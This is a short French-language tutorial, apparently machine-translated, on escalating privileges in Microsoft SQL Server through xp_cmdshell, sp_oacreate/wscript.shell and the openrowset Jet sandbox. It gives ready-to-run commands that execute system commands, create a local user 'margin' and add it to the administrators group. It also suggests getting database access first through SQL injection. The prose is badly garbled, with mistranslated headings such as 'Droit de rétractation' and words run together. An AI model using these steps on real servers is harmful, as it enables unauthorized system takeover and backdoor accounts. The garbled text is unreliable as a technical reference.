xp_cmdshellDroit de rétractation

xp_cmdshellEst un composant de la base de données qui peut exécuter des commandes système,Les droits peuvent être exercés en exécutant des commandes système à partir de ce composant
Vous pouvez utiliser le fichier de configuration ouSQLL'injection ou quelque chose comme ça,Obtenir les permissions de la base de données,Ensuite, exécutez l'instruction suivante
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’, 1;
RECONFIGURE;
C'est prêt.xp_cmdshell

Adopté à ce stadeEXEC master.dbo.xp_cmdshell ‘Les ordres’, Vous pouvez exécuter des commandes système pour des opérations d'autorisation telles que l'ajout d'utilisateurs

Sixp_cmdshellSupprimé,Téléchargerxplog70.dllRécupérable
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Program Files\Microsoft SQL
Server\MSSQL\Binn\xplog70.dll’
Enfin ferméxp_cmd_shell
exec sp_configure ‘show advanced options’, 1;
reconfigure;
exec sp_configure ‘xp_cmdshell’, 0;
reconfigure;

sp_oacreateDroit de rétractation

sp_oacreatePour appelerOLEObjet,Sixp_cmdshell Les composants supprimés peuvent également être utilisés avec OLEObjetrunMéthode d'exécution des commandes du système
Utilisé principalement pour appeler OLE Objet,Utilisation OLE Objet run Méthode d'exécution des commandes du système.
Activer：
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 1;
RECONFIGURE WITH OVERRIDE;

Fermer：
EXEC sp_configure ‘show advanced options’, 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure ‘Ole Automation Procedures’, 0;
RECONFIGURE WITH OVERRIDE;


Exécutez la commande comme suit
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod
@shell,‘run’,null,‘c:\windows\system32\cmd.exe /c whoami >c:\1.txt’

SQL Server Droit de soulever le bac à sable

Exécuter la commande via Sandbox
Ouvert：exec sp_configure ‘show advanced options’,1;reconfigure;
exec sp_configure ‘Ad Hoc Distributed Queries’,1;reconfigure;
Fermer：exec sp_configure 'show advanced option,1;RECONFIGURE;
exec sp configure ‘Ad Hoc Distributed Queries’,0;RECONFIGURE;

Exécuter les commandes du système select * from
openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,‘select shell(“net user
margin margin /add”)’)
select * from
openrowset(‘microsoft.jet.oledb.4.0’,’;database=c:/windows/system32/ias/ias.mdb’,‘select shell(“net
localgroup administrators margin /add”)’)